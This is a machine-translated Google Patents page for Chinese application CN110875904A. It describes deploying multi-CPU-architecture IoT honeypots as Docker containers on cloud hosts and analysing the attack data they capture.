CN110875904A - Method for realizing attack processing, honeypot deployment method, honeypot deployment medium and honeypot deployment device - Google Patents
Method for realizing attack processing, honeypot deployment method, honeypot deployment medium and honeypot deployment device Download PDFInfo
- Publication number
- CN110875904A CN110875904A CN201811012513.9A CN201811012513A CN110875904A CN 110875904 A CN110875904 A CN 110875904A CN 201811012513 A CN201811012513 A CN 201811012513A CN 110875904 A CN110875904 A CN 110875904A
- Authority
- CN
- China
- Prior art keywords
- honeypot
- cloud
- mirror image
- container
- honeypots
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Links
Images
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/1491—Countermeasures against malicious traffic using deception as countermeasure, e.g. honeypots, honeynets, decoys or entrapment
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L67/00—Network arrangements or protocols for supporting network services or applications
- H04L67/01—Protocols
- H04L67/10—Protocols in which an application is distributed across nodes in the network
- H04L67/1095—Replication or mirroring of data, e.g. scheduling or transport for data synchronisation between network nodes
Abstract
The application discloses a method and a device for realizing attack processing and a honeypot deployment method, which at least comprise the following steps: pulling a stored honeypot mirror image from a honeypot mirror image cloud warehouse, wherein the honeypot mirror image is a honeypot structure supporting a multi-CPU architecture; creating a container on a cloud host, wherein the container corresponds to honeypots supporting different CPU architectures; attack data is captured by honeypots supporting different CPU architectures. According to the method, the capture range of the honeypots is expanded by a cloud-based deployment mode, a flexible and dynamic honeypot cluster management mode is realized, and the value of honeypot data is deeply mined by combining with cloud big data analysis service; moreover, the cost of honeypot deployment and maintenance is reduced based on the characteristics of the container, and the time is saved.
Description
Technical Field
The present application relates to, but not limited to, a network anti-attack technology, and in particular, to a method for implementing attack processing based on Internet of things (IoT), a honeypot deployment method, a honeypot deployment medium, and a device.
Background
In the attack and defense countermeasures of the network space, the honeypot technology is used as an invasion bait to attract the attack of hackers. After the attack, through monitoring and analysis, on one hand, the method can be used for investigating the source of the attack and the latest attack and loophole launched aiming at the server, and on the other hand, whether the safety measure for protection is effective or not is investigated. The honeypot is a secure resource, and has a value of being scanned, attacked and trapped, that is, the honeypot has no other practical function, and all network traffic flowing into/out of the honeypot may indicate the scanning, attacking and trapping. The core value of honeypots is to monitor, detect, and analyze these attack activities.
The mainstream network attack mainly aims at PCs, servers and the like based on the x86CPU architecture, and thus, the honeypot technology in the related art is also mainly applied to hosts of the x86CPU architecture. In the related technology, the high-interaction honeypot considers the problems of hardware resources, maintainability, isolation from real resources and the like, a virtual machine technology is mostly used, the honeypot is deployed in a virtual host based on the high-interaction honeypot of the virtual host, and an attack source, attack behavior data, a malicious program and the like aiming at a server deployed under an x86CPU architecture can be captured.
The Internet of Things (IoT, Internet of Things) is also called sensor network, which is simply the extension of Internet from human to object. The internet of things refers to a huge network formed by combining various information sensing devices, such as radio frequency identification devices, infrared sensors, global positioning systems, laser scanners and the like, with the internet. The purpose is to connect all articles with the network, which is convenient for identification and management. With the development of IoT, network attacks on IoT devices become more serious, and the types of architectures used by IoT devices are wider, such as Advanced reduced instruction set Machine (ARM) architectures, Enhanced RISC Performance optimization (PowerPC) architectures, and the like, and honeypot technologies provided in the related art cannot capture attacks on these types of networks on one hand; on the other hand, the deployment range of the honeypot is limited by physical resources, IP resources and the like of honeypot users, so that the captured attack behavior is limited; moreover, when a large number of honeypots need to be deployed in the internet, the deployment and maintenance costs of conventional honeypots are large.
Disclosure of Invention
In order to solve the above technical problems, the present application provides a method, a honeypot deployment medium, and a device for implementing attack processing, which can implement wide-range prevention against network attacks of IoT devices and reduce cost at the same time.
In order to achieve the object of the present invention, the present application provides a method for implementing attack processing, including:
pulling a stored honeypot mirror image from a honeypot mirror image cloud warehouse, wherein the honeypot mirror image is a honeypot structure supporting a multi-CPU architecture;
creating a container on a cloud host, wherein the container corresponds to honeypots supporting different CPU architectures;
attack data is captured by honeypots supporting different CPU architectures.
Optionally, the method further comprises: and analyzing the attack data captured by the honeypots by utilizing cloud data analysis.
Optionally, the capturing of data by the honeypot comprises any combination of:
capturing a record of an attacker accessing a service;
capturing and analyzing a network data packet, and acquiring a honeypot network connection behavior after the attacker invades the honeypot according to the analyzed network information of the attacker;
and monitoring the malicious files and acquiring the information of the malicious files.
Optionally, when a new container needs to be deployed, the method further includes:
and pulling the honeypot mirror image in the honeypot mirror image cloud warehouse and quickly starting.
Optionally, the pulling the honeypot mirror image includes:
deploying a container client on the cloud host;
and obtaining the honeypot mirror image from the honeypot mirror image cloud warehouse by utilizing a container client.
Optionally, the container client comprises an open source container engine docker.
Optionally, the method further comprises: and controlling the honeypots of different CPU architectures to be mounted on different cloud hosts.
Optionally, the method further comprises:
packaging the network architecture information of the honeypots with different CPU architectures, which are mounted on different cloud hosts, into a visual mode for display;
and packaging the result of the cloud data analysis into a visual mode for display.
Optionally, the multi-CPU architecture comprises any combination of: advanced reduced instruction set machine ARM architecture, internal interlocking-free pipelined microprocessor instruction set MIPS architecture, enhanced reduced instruction set RISC performance optimization PowerPC architecture.
The application also provides a honeypot deployment method, which comprises the following steps:
creating a honeypot mirror image of a honeypot structure supporting a multi-CPU architecture;
and synchronously storing the created honeypot mirror image to a honeypot mirror image cloud warehouse.
Optionally, the method further comprises: pulling the honeypot mirror image, and creating a container on the cloud host, wherein the container corresponds to honeypots supporting different CPU architectures;
attack data is captured by honeypots supporting different CPU architectures.
Optionally, the method further comprises: and controlling the honeypots of different CPU architectures to be mounted on different cloud hosts.
Optionally, when a new container needs to be deployed, the method further includes:
and pulling the honeypot mirror image in the honeypot mirror image cloud warehouse and quickly starting.
Optionally, the pulling the honeypot mirror image includes:
deploying a container client on the cloud host;
and obtaining the honeypot mirror image from the honeypot mirror image cloud warehouse by utilizing a container client.
Optionally, the container client comprises an open source container engine docker.
Optionally, the method further comprises:
packaging the network architecture information of honeypots which control different CPU architectures and are mounted on different cloud hosts into a visual mode for display;
and packaging the result of the cloud data analysis into a visual mode for display.
Optionally, the multi-CPU architecture comprises any combination of: advanced reduced instruction set machine ARM architecture, internal interlocking-free pipelined microprocessor instruction set MIPS architecture, enhanced reduced instruction set RISC performance optimization PowerPC architecture.
The present application further provides a computer-readable storage medium storing computer-executable instructions for performing any one of the above methods for implementing attack processing and/or for performing any one of the above honeypot deployment methods.
The present application further provides an apparatus for implementing attack processing, comprising a memory and a processor, wherein the memory has stored thereon a computer program operable on the processor: for performing the steps of the method of implementing attack processing according to any of the above, and/or for performing the steps of the honeypot deployment method according to any of the above.
According to the method, the capture range of the honeypots is expanded by a cloud-based deployment mode, a flexible and dynamic honeypot cluster management mode is realized, and the value of honeypot data is deeply mined by combining with cloud big data analysis service; moreover, the cost of honeypot deployment and maintenance is reduced based on the characteristics of the container, time is saved, and a user can concentrate on analyzing attack behavior data.
Further, the high-interaction IoT honeypot based on the cloud and the container solves the problems that an existing honeypot cannot detect attacks on Internet of things equipment, cannot be deployed at multiple points in the whole network, and is high in operation and maintenance labor cost.
Additional features and advantages of the invention will be set forth in the description which follows, and in part will be obvious from the description, or may be learned by practice of the invention. The objectives and other advantages of the invention will be realized and attained by the structure particularly pointed out in the written description and claims hereof as well as the appended drawings.
Drawings
The accompanying drawings are included to provide a further understanding of the claimed subject matter and are incorporated in and constitute a part of this specification, illustrate embodiments of the subject matter and together with the description serve to explain the principles of the subject matter and not to limit the subject matter.
FIG. 1 is a flowchart of a method for implementing attack processing according to the present application;
FIG. 2 is a schematic diagram of an embodiment of the structure of the honeypot of the present application;
FIG. 3 is a schematic diagram of a component structure of an apparatus for implementing attack processing according to the present application;
FIG. 4 is a schematic diagram of a honeypot architecture according to an embodiment of the present application.
Detailed Description
To make the objects, technical solutions and advantages of the present application more apparent, embodiments of the present application will be described in detail below with reference to the accompanying drawings. It should be noted that the embodiments and features of the embodiments in the present application may be arbitrarily combined with each other without conflict.
In one exemplary configuration of the present application, a computing device includes one or more processors (CPUs), input/output interfaces, a network interface, and memory.
The memory may include forms of volatile memory in a computer readable medium, Random Access Memory (RAM) and/or non-volatile memory, such as Read Only Memory (ROM) or flash memory (flash RAM). Memory is an example of a computer-readable medium.
Computer-readable media, including both non-transitory and non-transitory, removable and non-removable media, may implement information storage by any method or technology. The information may be computer readable instructions, data structures, modules of a program, or other data. Examples of computer storage media include, but are not limited to, phase change memory (PRAM), Static Random Access Memory (SRAM), Dynamic Random Access Memory (DRAM), other types of Random Access Memory (RAM), Read Only Memory (ROM), Electrically Erasable Programmable Read Only Memory (EEPROM), flash memory or other memory technology, compact disc read only memory (CD-ROM), Digital Versatile Discs (DVD) or other optical storage, magnetic cassettes, magnetic tape, magnetic disk storage or other magnetic storage devices, or any other non-transmission medium that can be used to store information that can be accessed by a computing device. As defined herein, computer readable media does not include non-transitory computer readable media (transient media), such as modulated data signals and carrier waves.
The steps illustrated in the flow charts of the figures may be performed in a computer system such as a set of computer-executable instructions. Also, while a logical order is shown in the flow diagrams, in some cases, the steps shown or described may be performed in an order different than here.
In the related technology, the attack type mainly captured by the honeypot is the attack to the PC end and the server of the x86CPU architecture, the CPU architecture used by the Internet of things equipment is more in type, and as the attack to the Internet of things equipment becomes more serious, the honeypot capability used in the related technology is limited.
Fig. 1 is a flowchart of a method for implementing attack processing according to the present application, and as shown in fig. 1, the method includes:
step 100: and pulling the stored honeypot mirror image from the honeypot mirror image cloud warehouse, wherein the honeypot mirror image is a honeypot structure supporting a multi-CPU architecture.
Optionally, the honeypot mirror image is a honeypot mirror image of a honeypot structure supporting a multi-CPU architecture, such as a first CPU architecture honeypot mirror image, a second CPU architecture honeypot mirror image, a third CPU architecture honeypot mirror image. In this step, the honeypot mirror image can be pulled by using the container clients distributed on the cloud host.
The structure of honeypots in this application includes, but is not limited to: and simulating various CPU (Central processing Unit) architecture environments by using the open source simulation processor qemu, and deploying vulnerable services under each CPU architecture environment.
Due to the fact that the IoT devices are diverse, the CPU architectures used by common IoT devices are more in types, such as ARM, non-internal-interlocking pipelined system (MIPS), PowerPC, and the like, and specifically include x86, armel, armhf, MIPS, mipsel, ppc, sh4, and amd64, and in the embodiment of the present application, the Linux debian system is considered to be diverse in version and well supported by different CPU architectures, so that, on one hand, the Linux debian system can be installed in all CPU architecture environments simulated by using the open source simulation processor qemu; on the other hand, common vulnerable services such as SSH services, Telnet services and the like are installed on the system, and the purpose that the honeypot lures an attacker to attack is achieved by setting the services as weak passwords or unauthorized login. Fig. 2 shows a schematic view of an embodiment of the structure of a honeypot of the present application, as shown in fig. 2.
In the embodiment of the application, the mirror image is a file structure. A Docker image may be used to create a Docker container. Each command in Dockerfile creates a new hierarchy in the file system, the file system is built at these levels, and the image is built on top of these federated file systems. In the application, Docker provides a simple mechanism to create an image or update an existing image, so that a user can directly download a ready-made image from other users for direct use.
The drawing honeypot mirror image in this step includes:
deploying a container client such as an open source container engine docker on a cloud host;
the honeypot mirror image can be quickly pulled from the honeypot mirror image cloud warehouse by using the container client.
By way of example, as in fig. 4, a container 1 corresponding to the 1 st honeypot and a container 2 corresponding to the 2 nd honeypot are created in the first cloud host; a container 1 corresponding to the 3 rd honeypot and a container 2 corresponding to the 1 st honeypot are created in the second cloud host; a container 1 corresponding to the 4 th honeypot and a container 2 corresponding to the 1 st honeypot are created in the third cloud host. Wherein, different honeypots are different CPU architectures, such as: the 1 st honeypot is an ARM honeypot, the 2 nd honeypot is an MIPS honeypot, the 3 rd honeypot is an SH4 honeypot, and the 4 th honeypot is a PowerPC honeypot.
In the embodiment of the application, the warehouse is used for storing the image file, and after the image file is created, the image file can be uploaded to a public warehouse or a private warehouse by using a push command, so that if the image file needs to be used on another machine, the image file can be obtained only by adopting a pull command from the warehouse. Wherein, the process in the Docker container Only has write right to the readable and writable layer, and other layers are Read-Only (Read-Only) to the process.
Step 101: and creating a container on the cloud host, wherein the container corresponds to honeypots supporting different CPU architectures.
In the embodiment of the application, a plurality of honeypots with different CPU architectures are deployed on a plurality of cloud hosts. Because the computing service provided by the cloud service provider has the characteristics of configurability and elastic expansion, and by combining the characteristics, the honeypots can be managed more flexibly according to the requirements, such as: if the intrusion attack behavior under a certain type of CPU architecture needs to pay attention to, the number of honeypots of the CPU architecture can be flexibly controlled and increased, and the number of honeypots of other types of CPU architectures can be reduced, so that the purpose of dynamically controlling honeypot clusters according to requirements is achieved.
Optionally, when a new container needs to be deployed, the method further includes:
the rapid expansion of the new honeypot nodes can be realized by pulling and rapidly starting the honeypot mirror image in the honeypot mirror image cloud warehouse by using a container client such as an open source container engine docker.
In an actual network environment, SSH services, Telnet services and the like are commonly used and are easy to invade by attackers, the services are deployed in different CPU architecture system environments, and weak passwords or unauthorized login modes are set for the services to attract the attackers, so that after the attackers log in a system where honeypots are located, further malicious behavior operation is performed by using system permission.
In embodiments of the present application, a container is a running instance created from an image. Containers may be started, stopped, deleted. Each container is isolated from each other, so that a safe platform is guaranteed. In the embodiment of the application, the container can be regarded as a simple Linux environment, and the open source container engine docker runs the application by using the container.
Step 102: attack data is captured by honeypots supporting different CPU architectures.
By the honeypot, different types of attack behaviors such as attack sources, attack behavior data and malicious programs of the server deployed under various CPU architectures are captured.
In the embodiment of the application, because the data captured by the honeypots are stored in the cloud database, the data captured by the honeypots are conveniently analyzed by using the service of the online big data analysis platform provided by the access cloud service provider, that is, the user does not need to build a big data analysis cluster by himself, and the data captured by the honeypots are modeled and analyzed by using modes such as machine learning and algorithm, so that information contained in the honeypot data at a deeper level, such as attack behaviors, attack samples and attack organization relations, is mined.
The method for realizing attack processing further comprises the following steps:
and analyzing the attack data captured by the honeypots in the container by utilizing cloud data analysis.
The method also comprises the following steps: data were captured by honeypot.
Optionally, in order to capture data, a honeypot data acquisition client and a server are installed in each honeypot deployment cloud host, and the client sends the acquired data to the server and stores the data in a honeypot database after gathering the data. Specifically, after an attacker successfully logs in the honeypot, some operations are performed in the honeypot, the client records which commands and network connection contents are operated by a hacker, and attack information such as which malicious samples are downloaded and run, and further, log information such as the sequence and time of the operation of the attacker can be collected, and the log information may include but is not limited to: network traffic, attacker command logs, file samples, etc.
In one embodiment of the present application, the collection of honeypot data may include any combination of:
capturing records of attackers accessing and logging in SSH service and Telnet service;
capturing and analyzing a network data packet, and analyzing network information of an attacker, such as IP data, application layer data and the like, so as to obtain information of honeypot network connection behaviors and the like after the attacker invades honeypots;
monitoring the malicious files and obtaining the information of the malicious files, when an attacker writes new malicious files in the honeypot, storing samples of the malicious files, recording the creation time of the malicious files, calculating the hash values of the malicious files and the like.
Optionally, the method of the present application further comprises: honeypot mirrors of honeypot architectures that support multiple CPU architectures are stored.
Optionally, the method of the present application further includes: honeypots controlling different CPU architectures are mounted on different cloud hosts, such as distributed mounting in a cloud-based manner. Optionally, the method specifically includes:
the cloud service provider has a plurality of machine rooms in a plurality of regions around the world for users to select, and the IP sections allocated to the machine rooms in different regions are different, so that the IP mounted in the honeypot is controlled to be dispersed to different IP sections, and the purpose of enlarging the sample range of the captured attack behavior is achieved.
It should be noted that, in practical application, the functions of the cloud honeypot cluster control platform and the big data analysis platform can be integrated together, and the integrated functions are uniformly output to the user in the form of a website.
Optionally, the method of the present application further includes:
and packaging the network architecture information which controls honeypots with different CPU architectures and is distributed and mounted on different cloud hosts in a cloud-based mode and the result of the cloud-based data analysis in the step 101 into a visual mode which has a web interface and can be viewed and interacted by a user for displaying. Therefore, a user can use terminal equipment such as a mobile terminal and a PC terminal to access the equipment where the platform is located, so that the operation condition of the cloud honeypot cluster can be checked in real time, the analysis result of data captured by honeypots can be obtained, the number of honeypots with various CPU architectures can be controlled, and the purpose of quickly and conveniently knowing the current IoT attack trend can be achieved.
The cloud-based attack processing method enlarges the capture range of the existing honeypots, realizes an elastic and dynamic honeypot cluster management mode, and can deeply mine the value of honeypot data by combining with cloud big data analysis service; the honeypot deployment and maintenance cost is reduced based on the characteristics of the container, the time is saved, and a user can concentrate on analyzing attack behavior data. Moreover, the high-interaction IoT honeypot based on the cloud and the container is used for solving the problems that the existing honeypot cannot detect attacks on Internet of things equipment, cannot be deployed at multiple points in the whole network, and is high in operation and maintenance labor cost.
The application also provides a honeypot deployment method, which comprises the following steps: creating a honeypot mirror image of a honeypot structure supporting a multi-CPU architecture; and synchronously storing the created honeypot mirror image to a honeypot mirror image cloud warehouse.
When the honeypot deployed by the application is used for realizing attack processing, the method further comprises the following attack processing steps:
pulling the honeypot mirror image, and creating containers corresponding to honeypots supporting different CPU architectures on the cloud host;
different types of attack data are captured by honeypots supporting different CPU architectures.
Wherein the CPU architecture includes, but is not limited to, any combination of: ARM architecture, MIPS architecture, RISC performance optimization PowerPC architecture, etc.
The present application further provides a computer-readable storage medium storing computer-executable instructions for performing any one of the above methods for implementing attack processing and/or for performing any one of the above honeypot deployment methods.
The present application further provides an apparatus for implementing attack processing, comprising a memory and a processor, wherein the memory has stored thereon a computer program operable on the processor: for performing the steps of the method of implementing attack processing according to any of the above, and/or for performing the steps of the honeypot deployment method according to any of the above.
Fig. 3 is a schematic structural diagram of a device for implementing attack processing according to the present application, and as shown in fig. 3, the device at least includes: a preprocessing module and a capturing module; wherein the content of the first and second substances,
the preprocessing module is arranged for pulling the stored honeypot mirror image from the honeypot mirror image cloud warehouse, wherein the honeypot mirror image is a honeypot structure supporting a multi-CPU architecture; creating a container on a cloud host, wherein the container corresponds to honeypots supporting different CPU architectures;
and the capturing module is set to capture the attack data through honeypots supporting different CPU architectures.
Optionally, the apparatus for implementing attack processing according to the present application further includes:
an analysis module configured to analyze the attack data captured by the honeypots in the container using cloud data analysis.
Optionally, the honeypot mirror image pulled in the preprocessing module is specifically set as: deploying a container client such as an open source container engine docker on a cloud host; the honeypot mirror image can be quickly pulled from the honeypot mirror image cloud warehouse by using the container client.
Optionally, when a new container needs to be deployed, the preprocessing module is further configured to:
the rapid expansion of the new honeypot nodes can be realized by pulling and rapidly starting the honeypot mirror image in the storage module such as a honeypot mirror image cloud warehouse by using a container client such as an open source container engine docker.
Optionally, the apparatus of this application further includes: and the storage module is arranged for storing the honeypot mirror image of the honeypot structure supporting the multi-CPU architecture.
Optionally, the device of the present application further includes a honeypot database configured to store attack data captured by honeypots.
Optionally, the capturing module comprises: a client and a server, wherein,
the client is set to record which commands and network connection contents are operated by a hacker and download attack information such as which malicious samples are operated when the attacker successfully logs in the honeypot; sending the acquired data to a server;
and the server is used for summarizing the data from the client and storing the data in the honeypot database.
Optionally, the client is further configured to: collecting log information such as the order and time of the attacker's operation, which may include but is not limited to such as: network traffic, attacker command logs, file samples, etc.
Optionally, the data of the client may include any combination of the following:
capturing records of attackers accessing and logging in SSH service and Telnet service;
capturing and analyzing a network data packet, and analyzing network information of an attacker, such as IP data, application layer data and the like, so as to obtain information of honeypot network connection behaviors and the like after the attacker invades honeypots;
and monitoring the malicious files, storing a sample of the malicious files when an attacker writes new malicious files into the honeypot, recording the creation time of the malicious files, calculating the hash values of the malicious files and the like.
Optionally, the apparatus of this application further includes: and the control module is set to control honeypots with different CPU architectures to be distributed and mounted on different cloud hosts in a cloud-based mode.
Optionally, the control module is specifically configured to:
the cloud service provider has a plurality of machine rooms in a plurality of regions around the world for users to select, and the IP sections allocated to the machine rooms in different regions are different, so that the IP mounted in the honeypot is controlled to be dispersed to different IP sections, and the purpose of enlarging the sample range of the captured attack behavior is achieved.
Optionally, the control module is further configured to: the honeypots controlling different CPU architectures can be distributed and mounted on different cloud hosts in a cloud-based mode, and the network architecture information and the cloud data analysis result are packaged into a web interface which can be viewed by a user and can be displayed in an interactive mode. Therefore, a user can use terminal equipment such as a mobile terminal and a PC terminal to access the equipment where the platform is located, so that the operation condition of the cloud honeypot cluster can be checked in real time, the analysis result of data captured by honeypots can be obtained, the number of honeypots with various CPU architectures can be controlled, and the purpose of quickly and conveniently knowing the current IoT attack trend can be achieved.
Fig. 4 is a schematic composition diagram of an embodiment of a honeypot architecture of the present application, as shown in fig. 4, at least including: a honeypot mirror image cloud warehouse, a honeypot cluster including one or more cloud hosts (e.g., a first cloud host, a second cloud host,. a., an mth cloud host in fig. 4), a honeypot management platform, a cloud database, and a honeypot data collection end; wherein the content of the first and second substances,
a honeypot mirror image cloud repository for storing honeypot mirror images of honeypot structures supporting multiple CPU architectures, such as the first CPU architecture honeypot mirror image, the second CPU architecture honeypot mirror image, and the third CPU architecture honeypot mirror image in fig. 4.
The honeypot structure in this application includes: and simulating various CPU (Central processing Unit) architecture environments by using the open source simulation processor qemu, and deploying vulnerable services under each CPU architecture environment.
Due to the fact that the IoT devices are diverse, the CPU architectures used by common IoT devices are more in types, such as ARM, non-internal-interlocking pipelined processor (MIPS), PowerPC, and the like, and specifically include x86, armel, armhf, MIPS, mipsel, ppc, sh4, and amd64, and in the present application, the Linux binary system is considered to be diverse in version and well supported by different CPU architectures, so that, on one hand, the Linux binary system can be installed in all CPU architecture environments simulated by using the open source simulation processor qemu; on the other hand, common vulnerable services such as SSH services, Telnet services and the like are installed on the system, and the purpose that the honeypot lures an attacker to attack is achieved by setting the services as weak passwords or unauthorized login. As shown in fig. 2, fig. 2 shows a schematic view of an embodiment of the honey pot structure of the present application.
In the present application, a mirror image is a file structure. A Docker image may be used to create a Docker container. Each command in Dockerfile creates a new hierarchy in the file system, the file system is built at these levels, and the image is built on top of these federated file systems. In the application, Docker provides a simple mechanism to create an image or update an existing image, so that a user can directly download a ready-made image from other users for direct use.
In an actual network environment, SSH services, Telnet services and the like are commonly used and are easy to invade by attackers, the services are deployed in different CPU architecture system environments, and weak passwords or unauthorized login modes are set for the services to attract the attackers, so that after the attackers log in a system where honeypots are located, further malicious behavior operation is performed by using system permission.
The cloud host is provided with a container client, such as an open source container engine docker, and the container client can be used for quickly pulling the honeypot mirror image from the honeypot mirror image cloud warehouse and creating a container of a corresponding honeypot. By way of example, as in fig. 4, a container 1 corresponding to the 1 st honeypot and a container 2 corresponding to the 2 nd honeypot are created in the first cloud host; a container 1 corresponding to the 3 rd honeypot and a container 2 corresponding to the 1 st honeypot are created in the second cloud host; a container 1 corresponding to the 4 th honeypot and a container 2 corresponding to the 1 st honeypot are created in the third cloud host. Wherein, different honeypots are different CPU architectures, such as: the 1 st honeypot is an ARM honeypot, the 2 nd honeypot is an MIPS honeypot, the 3 rd honeypot is an SH4 honeypot, and the 4 th honeypot is a PowerPC honeypot.
In the application, when a new container needs to be deployed, the honeypot mirror image in the honeypot mirror image cloud warehouse is pulled and quickly started by using a container client such as an open source container engine docker, so that the new honeypot node is quickly expanded.
And the honeypot data acquisition end is used for acquiring behavior data of an attacker interacting with the honeypot, namely data captured by the honeypot and storing the data in the cloud database.
The cloud honeypot management platform is at least provided with a big data analysis platform and is used for analyzing data captured by honeypots.
In the method, the data captured by the honeypots are stored in the cloud database, so that the data captured by the honeypots are conveniently analyzed by using the service of the online big data analysis platform provided by the access cloud service provider, namely, the user does not need to build a big data analysis cluster by himself, modeling analysis on the data captured by the honeypots by using modes such as machine learning and algorithm is achieved, and therefore information contained in the honeypot data at a deeper level, such as attack behaviors, attack samples and attack organization relations, is mined.
The honeypot architecture shown in fig. 4 of the present application further includes: the cloud honeypot cluster control platform is arranged in the cloud honeypot management platform and used for controlling honeypots with different CPU architectures to be distributed and mounted on cloud hosts in the cloud honeypot cluster in a cloud-based mode. Specifically, the cloud service provider has multiple machine rooms in multiple regions around the world for users to select, and the IP sections allocated to the machine rooms in different regions are different, so that the IP mounted in the honeypot is controlled to be dispersed to different IP sections, and the purpose of enlarging the sample range of the captured attack behavior is achieved.
It should be noted that, in practical application, the functions of the cloud honeypot cluster control platform and the big data analysis platform can be integrated together, and the integrated functions are uniformly output to the user in the form of a website.
As shown in fig. 4, honeypots of different CPU architectures are deployed on multiple cloud hosts. Because the computing service provided by the cloud service provider has the characteristics of configurability and elastic expansion, and by combining the characteristics, honeypots can be managed more flexibly according to requirements, such as: if the intrusion attack behavior under a certain type of CPU architecture needs to pay attention to, the number of honeypots of the CPU architecture can be flexibly controlled and increased, and the number of honeypots of other types of CPU architectures can be reduced, so that the purpose of dynamically controlling honeypot clusters according to requirements is achieved.
In the application, the result of the cloud honeypot cluster control platform and the result of the big data analysis platform can be packaged into a platform which has a web interface, can be viewed by a user and can be interacted with the user. Therefore, a user can use terminal equipment such as a mobile terminal and a PC terminal to access the equipment where the platform is located, so that the operation condition of the cloud honeypot cluster can be checked in real time, the analysis result of data captured by honeypots can be obtained, the number of honeypots with various CPU architectures can be controlled, and the purpose of quickly and conveniently knowing the current IoT attack trend can be achieved.
The honeypot architecture shown in fig. 4 of the present application is a cloud-based honeypot architecture. Cloud computing is a pay-per-use model that provides available, convenient, on-demand network access into a configurable shared pool of computing resources, including but not limited to: networks, servers, storage, applications, services, etc. that can be provided quickly with little administrative effort or interaction with the service provider. By utilizing the elasticity, the acquisition of wider IP resources and computing resources is realized, and the capture range of honeypots in the Internet is expanded; in addition, some cloud service providers provide services such as big data calculation and the like, and help users to better mine the value of data.
The cloud-based deployment method expands the capture range of the existing honeypots, realizes an elastic and dynamic honeypot cluster management mode, and can deeply mine the value of honeypot data by combining with cloud big data analysis service; the honeypot deployment and maintenance cost is reduced based on the characteristics of the container, the time is saved, and a user can concentrate on analyzing attack behavior data. Moreover, the high-interaction IoT honeypot based on the cloud and the container is used for solving the problems that the existing honeypot cannot detect attacks on Internet of things equipment, cannot be deployed at multiple points in the whole network, and is high in operation and maintenance labor cost.
Although the embodiments disclosed in the present application are described above, the descriptions are only for the convenience of understanding the present application, and are not intended to limit the present application. It will be understood by those skilled in the art that various changes in form and details may be made therein without departing from the spirit and scope of the disclosure as defined by the appended claims.
Claims (19)
1. A method of implementing attack processing, comprising:
pulling a stored honeypot mirror image from a honeypot mirror image cloud warehouse, wherein the honeypot mirror image is a honeypot structure supporting a multi-CPU architecture;
creating a container on a cloud host, wherein the container corresponds to honeypots supporting different CPU architectures;
attack data is captured by honeypots supporting different CPU architectures.
2. The method of claim 1, further comprising: and analyzing the attack data captured by the honeypots by utilizing cloud data analysis.
3. The method of claim 1 or 2, wherein said capturing data by said honeypot comprises any combination of:
capturing a record of an attacker accessing a service;
capturing and analyzing a network data packet, and acquiring a honeypot network connection behavior after the attacker invades the honeypot according to the analyzed network information of the attacker;
and monitoring the malicious files and acquiring the information of the malicious files.
4. The method of claim 1, when a new container needs to be deployed, the method further comprising:
and pulling the honeypot mirror image in the honeypot mirror image cloud warehouse and quickly starting.
5. The method of claim 1 or 4, wherein the pulling a honeypot mirror image comprises:
deploying a container client on the cloud host;
and obtaining the honeypot mirror image from the honeypot mirror image cloud warehouse by utilizing a container client.
6. The method of claim 5, wherein the container client comprises an open source container engine docker.
7. The method of claim 1 or 2, further comprising after the method: and controlling honeypots of different CPU architectures to be mounted on different cloud hosts.
8. The method of claim 7, further comprising:
packaging the network architecture information of the honeypots with different CPU architectures, which are mounted on different cloud hosts, into a visual mode for display;
and packaging the result of the cloud data analysis into a visual mode for display.
9. The method of claim 1, wherein the multi-CPU architecture comprises any combination of: advanced reduced instruction set machine ARM architecture, internal interlocking-free pipelined microprocessor instruction set MIPS architecture, enhanced reduced instruction set RISC performance optimization PowerPC architecture.
10. A honeypot deployment method, comprising:
creating a honeypot mirror image of a honeypot structure supporting a multi-CPU architecture;
and synchronously storing the created honeypot mirror image to a honeypot mirror image cloud warehouse.
11. The honeypot deployment method of claim 10, the method further comprising: pulling the honeypot mirror image, and creating a container on the cloud host, wherein the container corresponds to honeypots supporting different CPU architectures;
attack data is captured by honeypots supporting different CPU architectures.
12. The honeypot deployment method of claim 10 or 11, further comprising after the method: and controlling the honeypots of different CPU architectures to be mounted on different cloud hosts.
13. The honeypot deployment method of claim 10, when a new container needs to be deployed, the method further comprising:
and pulling the honeypot mirror image in the honeypot mirror image cloud warehouse and quickly starting.
14. The honeypot deployment method of claim 10 or 13, wherein the pulling a honeypot image comprises:
deploying a container client on the cloud host;
and obtaining the honeypot mirror image from the honeypot mirror image cloud warehouse by utilizing a container client.
15. The honeypot deployment method of claim 14, wherein the container client comprises an open source container engine docker.
16. The honeypot deployment method of claim 10 or 11, the method further comprising:
packaging the network architecture information of honeypots which control different CPU architectures and are mounted on different cloud hosts into a visual mode for display;
and packaging the result of the cloud data analysis into a visual mode for display.
17. The honeypot deployment method of claim 10, wherein the multi-CPU architecture comprises any combination of: advanced reduced instruction set machine ARM architecture, internal interlocking-free pipelined microprocessor instruction set MIPS architecture, enhanced reduced instruction set RISC performance optimization PowerPC architecture.
18. A computer-readable storage medium storing computer-executable instructions for performing the method of implementing attack processing of any one of claims 1 to 9 and/or for performing the honeypot deployment method of any one of claims 10 to 17.
19. An apparatus for implementing attack processing, comprising a memory and a processor, wherein the memory has stored thereon a computer program operable on the processor to: for performing the steps of the method of implementing attack processing according to any one of claims 1 to 9 and/or for performing the honeypot deployment method according to any one of claims 10 to 17.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201811012513.9A CN110875904A (en) | 2018-08-31 | 2018-08-31 | Method for realizing attack processing, honeypot deployment method, honeypot deployment medium and honeypot deployment device |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201811012513.9A CN110875904A (en) | 2018-08-31 | 2018-08-31 | Method for realizing attack processing, honeypot deployment method, honeypot deployment medium and honeypot deployment device |
Publications (1)
| Publication Number | Publication Date |
|---|---|
